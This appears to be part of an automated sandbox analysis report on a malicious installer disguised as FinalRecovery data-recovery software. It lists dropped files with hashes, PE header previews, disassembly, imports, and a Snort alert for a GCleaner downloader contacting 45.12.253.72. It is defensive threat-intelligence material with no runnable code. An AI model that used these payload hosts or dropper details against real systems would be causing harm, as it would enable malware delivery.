SSDEEP:	24576:O8sn21M2uJJKYcbmuBm/GAihHJTo+M/FLUTTb2ghAfrZLya6p4ZyQzAp:dsroY6mGAugUlgIbn
MD5:	686E27330B438E55788EE0A132194478
SHA1:	19AB1A4D5724A647984EDBBDAC465E98F7093B2F
SHA-256:	5D07E971A265774EE4C2ACF51CC41C815D247284C1A69AD05298FD54A7285FCF
SHA-512:	B54D7258AFEB1243445A7E344655D6A050E8F5F44FEBAFF3C5D62D6CEFBC49F948CD35A549D0AFD654310CA3E50951C23863007F94BF944C0957496C4DE96AA6
Malicious:	false
Preview:	.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5..c..........................................@..........................@....................................................... ..`............................................................................................................text............................... ..`.rdata..:........ ..................@..@.data... ...........................@....tls....!...........................@....rsrc........ ....... ..............@..@.fga20..._......._..................`.7.................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-RVFGU.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	791040
Entropy (8bit):	6.608982798504157
Encrypted:	false
SSDEEP:	24576:pvfBdvyjNf8cbMtMJjLKRfwaNSkxtkNkYzSYcj0oHyxdpVhNZFGv+56nBb/ExWyt:pBC4rTQnC1QaX4+I
MD5:	5C2FE7D4DDE65810152054F3C93C1815
SHA1:	2A19F3FAA78A5072068F7902DB19A248F11FA69B
SHA-256:	233D846FEB73A38141BDF6C813C7476FA3F66DCD3548338607F3B7CB61CAC730
SHA-512:	2C01AE918044829FC649F0775BF3FFDB417B1524B47CDABFF0C06B6382B6578A742D9C1D036090D7AD1FC3A8B7D563D28C0CDB94DE572BF883389825F73FD654
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................\|......$.............@..............................................@...........................@...,...0..............................................................................DH...............................text...D{.......\|.................. ..`.itext..l........................... ..`.data...l8.......:..................@....bss.....C...............................idata...,...@......................@....tls....4....p...........................rdata..............................@..@.reloc..............................@..B.rsrc........0......................@..@....................................@..@................................................................................................

C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-U89TP.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	723230
Entropy (8bit):	6.49191904892708
Encrypted:	false
SSDEEP:	12288:1QtLeYXPEv4arPEn37TzH7A6p3xxu9yz/eERMY1VLJrNufs9RZM2GHOQyD362kSW:WtCUA4arPEn37TzH7A6nw9yzeESUFWHF
MD5:	D0E4493CD1CEC1B97F24BAB12A942543
SHA1:	CEE352F43F982FCB36A337D2C15FFDD28B04B80D
SHA-256:	C5851530669107DF77FD7079EC7C6F0C668003D6094643D6E723FB74F1DEB5D9
SHA-512:	D2A02702AEDE0509AC81785DBECBA312CABD6D83E064DCAA7E95B43FF4E373D538327539290288CED6A6837F44819A6A7CCC912285E5E1407F9B79C086B6C58F
Malicious:	true
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................b...........n............@..............................................@...............................%.......@..........................................................................................................CODE.....`.......b.................. ..`DATA.................f..............@...BSS..................x...................idata...%.......&...x..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc....@.......@..................@..P.....................j..............@..P........................................................................................................................................

C:\Program Files (x86)\FgasoftFR\FinalRecovery\unins000.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	InnoSetup Log FgasoftFR FinalRecovery, version 0x30, 4340 bytes, 585948\user, "C:\Program Files (x86)\FgasoftFR\FinalRecovery"
Category:	dropped
Size (bytes):	4340
Entropy (8bit):	4.712609745266559
Encrypted:	false
SSDEEP:	96:AyWx5pJU+oIahqwOIhdc87ICSss/LBtbgfj1:AyWx5pJU+KEIhZICSsATgfJ
MD5:	15CF1A53B3514856C721F859E721DCBD
SHA1:	9BC828AC64112060DB3059F8EEC43722BE1AB041
SHA-256:	87159F502A66551DA4E65C05DB04E132CBC46B1D4370EEC9022499FBEAD59A84
SHA-512:	C49D7B0D200BC65FA055302353FAC99BBD379D81EF0D220411A379006D4A6A3AA716D36F0E9E2B1BD2AFD699941F5547E371AFB277B99800CFB290A379C5DB99
Malicious:	false
Preview:	Inno Setup Uninstall Log (b)....................................FgasoftFR FinalRecovery.........................................................................................................FgasoftFR FinalRecovery.........................................................................................................0...........%.................................................................................................................Wc(.......y.s.......N....585948.user.C:\Program Files (x86)\FgasoftFR\FinalRecovery.............:.Z.. ..........b.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.d

C:\Program Files (x86)\FgasoftFR\FinalRecovery\unins000.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	723230
Entropy (8bit):	6.49191904892708
Encrypted:	false
SSDEEP:	12288:1QtLeYXPEv4arPEn37TzH7A6p3xxu9yz/eERMY1VLJrNufs9RZM2GHOQyD362kSW:WtCUA4arPEn37TzH7A6nw9yzeESUFWHF
MD5:	D0E4493CD1CEC1B97F24BAB12A942543
SHA1:	CEE352F43F982FCB36A337D2C15FFDD28B04B80D
SHA-256:	C5851530669107DF77FD7079EC7C6F0C668003D6094643D6E723FB74F1DEB5D9
SHA-512:	D2A02702AEDE0509AC81785DBECBA312CABD6D83E064DCAA7E95B43FF4E373D538327539290288CED6A6837F44819A6A7CCC912285E5E1407F9B79C086B6C58F
Malicious:	true
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................b...........n............@..............................................@...............................%.......@..........................................................................................................CODE.....`.......b.................. ..`DATA.................f..............@...BSS..................x...................idata...%.......&...x..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc....@.......@..................@..P.....................j..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\fuckingdllENCR[1].dll

Download File

Process:	C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
File Type:	data
Category:	dropped
Size (bytes):	95248
Entropy (8bit):	7.998277474001343
Encrypted:	true
SSDEEP:	1536:1ajIVNDkCngyeaL3ZC7cjgn35QgjaeiPr6idOZAkOLfTRCaLQhAboaAkepTXnkY5:1vVpj3ZC72gnJQg2eikik4FC9/RX+f6
MD5:	636E3CA21F2541B5EE3AB9922A183C79
SHA1:	4B98C5432E534AF5FA17424C907E61CCFA6880D9
SHA-256:	9B97BF40465ACFBAB5D61EE45ECAC1E485A988ADC66E1A859F950605DC5677B9
SHA-512:	6AA99DFAB439063332383EBA737F34A5929353794245E8E4469EAEB2F7055889891D5A3F3CD3C9F20E37DCDEBFA78C5B5749F3BFDF40263970C880F047A0BDBB
Malicious:	false
Preview:	..'m..h.f{Q{..7_....l../....3`.p.$.....]....~@..Vt.%..eB.9a../_...G...\|.O..0HG`......`... k..x#.).....W..n...;.vmN....T..:l...........37r.../..X.1,..)..^.Y....N.{8........=..R..E.z.c..G.~X.0.}.b....rE..d...........(...M`.O.Y....?....D...R....N...C.{..E.\i.......:.h...#..\...d...O.."..N.yw.2.$..L.{....[w\....v.....zm....9.\|.q...p....j.WfQ.5h^rY.r.-..^}g.......]%...El.98Q..5F).F...).KBD..<0..l7...:..!.....L..P.l..oV....h..~;.G..K....-..={.....U.%...~.(.DE..8..df./...n...FC....~#.`.a........B.r..OJ^-...$.(`...N..k....P..h.....+.o...W.m.0...&j...E...Sip..p...U..Qx...q.[.."......U..n\|.Me_...PT.\|c.wt....5l...'..f..6n..,.+....4....J.\..+..\..C...:1.u..l.h...n.6..5P.-/........m70D..D._....?..9.V...M8..m.T.]4.i.IQN....BV..."h.......f......V.(..W..H.`,.V`..l.;...}.@.......*..rD....6OP.OC#^......=^7.R...tx..Q<..J..o.n..q.O..f.F....).Y2v..I...g.lnV.X..sm.>....^eO.l.....EB...u.m.E.\|.X...)b 7.K.ma."..%t..p.....U\.....L..A.:._.@...c3..[.m...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\stuk[1].htm

Download File

Process:	C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	21
Entropy (8bit):	3.975418017913833
Encrypted:	false
SSDEEP:	3:iIxcsJE:iyE
MD5:	C0236A8F8EB0411CC373CD432E252990
SHA1:	49CA519830FADD97FA7BFB7C3404ED2DB29DF4E0
SHA-256:	375CD2A305050C0ECDC8EF9A417194DB2955F3C99B04C76F1B2CD5A88369A242
SHA-512:	3EDFDF13D9AE53C3DC77B299137C7F318B689F4880D72E50CF037F5A4F5C2A6CBC24CB5FE557C10F458CD1658B65E27EF994794FAB2D8E1562694E7DE5039E7E
Malicious:	false
Preview:	kvQoRqtcCyMtHmQyQXOUu

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\dll[1].htm

Download File

Process:	C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\dll[1].htm

Download File

Process:	C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\plus[1].htm

Download File

Process:	C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_RegDLL.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.026670007889822
Encrypted:	false
SSDEEP:	48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
MD5:	0EE914C6F0BB93996C75941E1AD629C6
SHA1:	12E2CB05506EE3E82046C41510F39A258A5E5549
SHA-256:	4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
SHA-512:	A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................\|.......\|.......\|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_iscrypt.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	2.8818118453929262
Encrypted:	false
SSDEEP:	24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
MD5:	A69559718AB506675E907FE49DEB71E9
SHA1:	BC8F404FFDB1960B50C12FF9413C893B56F2E36F
SHA-256:	2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
SHA-512:	E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.215994423157539
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
MD5:	4FF75F505FDDCC6A9AE62216446205D9
SHA1:	EFE32D504CE72F32E92DCF01AA2752B04D81A342
SHA-256:	A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
SHA-512:	BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_shfoldr.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	23312
Entropy (8bit):	4.596242908851566
Encrypted:	false
SSDEEP:	384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5:	92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:	3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:	9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:	9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	712704
Entropy (8bit):	6.4837542632664515
Encrypted:	false
SSDEEP:	12288:9QtLeYXPEv4arPEn37TzH7A6p3xxu9yz/eERMY1VLJrNufs9RZM2GHOQyD362kS0:+tCUA4arPEn37TzH7A6nw9yzeESUFWH/
MD5:	D76329B30DB65F61D55B20F36B56DA26
SHA1:	5E4C77B723AE8F05B3AE6AFEEE735A4355F00663
SHA-256:	229FBCB11EE7D1F082B6411610E95F726EEC4E6737E6B6392719DF4F0FE3FA1D
SHA-512:	A291AED0897315E88B6378B1DB10ADA05BDA8C1ECCAF73DE23F409FE61860EBD1DBB422063E00996584D3B4B100122931D5BBAB54A88951706D75EFCC660F70D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................b...........n............@..............................................@...............................%.......@..........................................................................................................CODE.....`.......b.................. ..`DATA.................f..............@...BSS..................x...................idata...%.......&...x..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc....@.......@..................@..P.....................j..............@..P........................................................................................................................................

C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\6tohc1clzbcir.exe

Download File

Process:	C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	6.20389308045717
Encrypted:	false
SSDEEP:	1536:bvUpDLxyxA14o3/M238r6+XfHAgbqmE8MpKdwuasZLUM7DsWlXcdyZgfmi:WDLZKa/MtXfHAgbqmEtxsfmyZgfmi
MD5:	3FB36CB0B7172E5298D2992D42984D06
SHA1:	439827777DF4A337CBB9FA4A4640D0D3FA1738B7
SHA-256:	27AE813CEFF8AA56E9FA68C8E50BB1C6C4A01636015EAC4BD8BF444AFB7020D6
SHA-512:	6B39CB32D77200209A25080AC92BC71B1F468E2946B651023793F3585EE6034ADC70924DBD751CF4A51B5E71377854F1AB43C2DD287D4837E7B544FF886F470C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 60%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................................................................9...........Rich............................PE..L....,?c.....................~......_.............@..........................`............@.....................................(....@.......................P..........8...............................@............................................text............................... ..`.rdata..dY.......Z..................@..@.data........ ......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.992737502830512
TrID:	Win32 Executable (generic) a (10002005/4) 98.86% Inno Setup installer (109748/4) 1.08% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	file.exe
File size:	1782938
MD5:	14e09c7a5842688842f6c0bf61c17135
SHA1:	4c9e1cbcd933293268c396b3c79f3836665059a8
SHA256:	a5ce2c21d3f92080a06e0aa7862303848b2661181b279a2db9b72b8f31a82702
SHA512:	291eba7114f626be1a02953267f4741adeb71593a75cbb8c65e74dc2783253fc94616ae73126dd2d7dd5eb273cebd6413d36a2a67fae66c1796e5b08c7344b15
SSDEEP:	49152:Zj8WUqIwpfvQvBkF9PPeaPhUMewEgjkdLCgv2MR:98WxIU+mzsv2MR
TLSH:	7885335282B1D4B9E293A77C3C33DD692ED3BA1961781024331E56CF1F277A2AC4E356
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	a2a0b496b2caca72

Static PE Info

General

Entrypoint:	0x409c18
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	1
OS Version Minor:	0
File Version Major:	1
File Version Minor:	0
Subsystem Version Major:	1
Subsystem Version Minor:	0
Import Hash:	884310b1928934402ea6fec1dbd3cf5e

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFC4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-24h], eax
call 00007EFFD44E77E3h
call 00007EFFD44E89EAh
call 00007EFFD44E8C79h
call 00007EFFD44EAC88h
call 00007EFFD44EACCFh
call 00007EFFD44ED5FEh
call 00007EFFD44ED765h
xor eax, eax
push ebp
push 0040A2D4h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 0040A29Dh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [0040C014h]
call 00007EFFD44EE1CBh
call 00007EFFD44EDDFEh
lea edx, dword ptr [ebp-10h]
xor eax, eax
call 00007EFFD44EB2B8h
mov edx, dword ptr [ebp-10h]
mov eax, 0040CDE8h
call 00007EFFD44E788Fh
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [0040CDE8h]
mov dl, 01h
mov eax, 00407364h
call 00007EFFD44EBB47h
mov dword ptr [0040CDECh], eax
xor edx, edx
push ebp
push 0040A255h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007EFFD44EE23Bh
mov dword ptr [0040CDF4h], eax
mov eax, dword ptr [0040CDF4h]
cmp dword ptr [eax+0Ch], 01h
jne 00007EFFD44EE37Ah
mov eax, dword ptr [0040CDF4h]
mov edx, 00000028h
call 00007EFFD44EBF48h
mov edx, dword ptr [000000F4h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd000	0x950	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x11000	0x2c00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xf000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x933c	0x9400	False	0.6138883023648649	data	6.557291120606636	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0xb000	0x24c	0x400	False	0.3134765625	data	2.7679914923058866	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0xc000	0xe4c	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xd000	0x950	0xa00	False	0.414453125	data	4.430733069799036	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xe000	0x8	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xf000	0x18	0x200	False	0.052734375	data	0.2044881574398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x10000	0x8b4	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x11000	0x2c00	0x2c00	False	0.3243075284090909	data	4.467134664034375	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x11354	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	Dutch	Netherlands
RT_ICON	0x1147c	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	Dutch	Netherlands
RT_ICON	0x119e4	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	Dutch	Netherlands
RT_ICON	0x11ccc	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	Dutch	Netherlands
RT_STRING	0x12574	0x2f2	data
RT_STRING	0x12868	0x30c	data
RT_STRING	0x12b74	0x2ce	data
RT_STRING	0x12e44	0x68	data
RT_STRING	0x12eac	0xb4	data
RT_STRING	0x12f60	0xae	data
RT_RCDATA	0x13010	0x2c	data
RT_GROUP_ICON	0x1303c	0x3e	data	English	United States
RT_VERSION	0x1307c	0x4b8	COM executable for DOS	English	United States
RT_MANIFEST	0x13534	0x560	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll	MessageBoxA
oleaut32.dll	VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll	WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll	TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll	InitCommonControls
advapi32.dll	AdjustTokenPrivileges

Possible Origin

Language of compilation system	Country where language is spoken	Map
Dutch	Netherlands
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
45.12.253.72192.168.2.380497082852925 01/25/23-10:02:04.044834	TCP	2852925	ETPRO TROJAN GCleaner Downloader - Payload Response	80	49708	45.12.253.72	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 25, 2023 10:02:03.838169098 CET	49707	80	192.168.2.3	45.12.253.56
Jan 25, 2023 10:02:03.864574909 CET	80	49707	45.12.253.56	192.168.2.3
Jan 25, 2023 10:02:03.864726067 CET	49707	80	192.168.2.3	45.12.253.56
Jan 25, 2023 10:02:03.866645098 CET	49707	80	192.168.2.3	45.12.253.56
Jan 25, 2023 10:02:03.894937992 CET	80	49707	45.12.253.56	192.168.2.3
